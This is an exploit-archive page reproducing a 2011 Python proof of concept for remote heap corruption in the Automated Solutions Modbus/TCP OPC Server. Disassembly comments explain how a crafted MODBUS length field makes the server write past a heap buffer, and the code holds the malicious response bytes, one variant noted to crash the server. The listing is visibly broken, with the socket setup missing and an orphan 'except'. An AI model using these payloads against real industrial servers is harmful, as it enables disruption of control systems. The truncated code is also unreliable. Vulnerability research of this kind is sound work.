Automated Solutions Modbus/TCP OPC Server – Remote Heap Corruption (PoC)

  • 作者: Jeremy Brown
    日期: 2011-01-25
  • 类别:
  • 来源:
  • #!/usr/bin/python
    # Automated Solutions Modbus/TCP OPC Server Remote Heap Corruption PoC
    # Jeremy Brown [0xjbrown41-gmail-com]
    # Jan 2011
    # A specially crafted length field in a MODBUS packet header can trigger heap corruption.
    # 00408312|> 8B5424 3CMOV EDX,DWORD PTR SS:[ESP+3C] -> move length into edx
    # 00408316|. 53 PUSH EBX-> push src onto stack
    # 00408317|. 8B5C24 3CMOV EBX,DWORD PTR SS:[ESP+3C] -> move dest into ebx 
    # 0040831B|. 8BCA MOV ECX,EDX -> move length into ecx
    # 0040831D|. 55 PUSH EBP-> push ebp onto stack
    # 0040831E|. 8BE9 MOV EBP,ECX -> move ecx into ebp
    # 00408320|. 57 PUSH EDI-> push edi onto stack
    # 00408321|. 33C0 XOR EAX,EAX -> eax = 0
    # 00408323|. 8BFB MOV EDI,EBX -> move dest into edi
    # 00408325|. 895C24 1CMOV DWORD PTR SS:[ESP+1C],EBX -> move ebx into dword at esp+1c
    # 00408329|. C1E9 02SHR ECX,2 -> shift ecx right twice
    # 0040832C|. F3:ABREP STOS DWORD PTR ES:[EDI] -> fill ecx dwords at edi with eax
    # So basically memset(edi,eax,ecx). We control ecx, so we have control over the number of dwords
    # it writes in the heap buffer. But, as you can see, the dwords themselves are not controllable,
    # they are NULL. However, we can still write past the bounds of the allocated chunk of memory.
    # Although it seems unlikely code execution could result, it is still possible to write data
    # past the memory allocated on a heap (0x350000) available in the server process.
    # This code works by setting up a fake channel and accepting a connection. To trigger this
    # vulnerability, the server simply needs to initiate communication (monitor mode would be ideal)
    # with this fake channel and the results depend on the response you choose.
    # I tested version 3 running on Windows. Testing the server with this code and its default
    # response should't cause the server to crash (immediately anyways). Larger lengths (such as
    # the one commented out) may cause the server to crash.
    # Patch:
    import sys
    import socket
    # [trans][prot] [len][u] [f][bc][data]
    resp="\x00\x00"+"\x00\x00"+"\x02\x01"+"\x00"+"\x03"+"\x02"+"\x00\x00" # break @ 40832c, dump edi, keep hitting f9 and watch (debug)
    #resp="\x00\x00"+"\x00\x00"+"\x02\xb0"+"\x00"+"\x03"+"\x02"+"\x00\x00" # Heap block at 0035F2D0 modified at 0035F4E7 past requested size of 20f
    except IOError,e:
     print e
    print "OPC server at %s connected\n"%addr[0]
    print "<-- %s"%req.encode("hex")
    print "--> %s\n"%resp.encode("hex")
    print "finished, check server"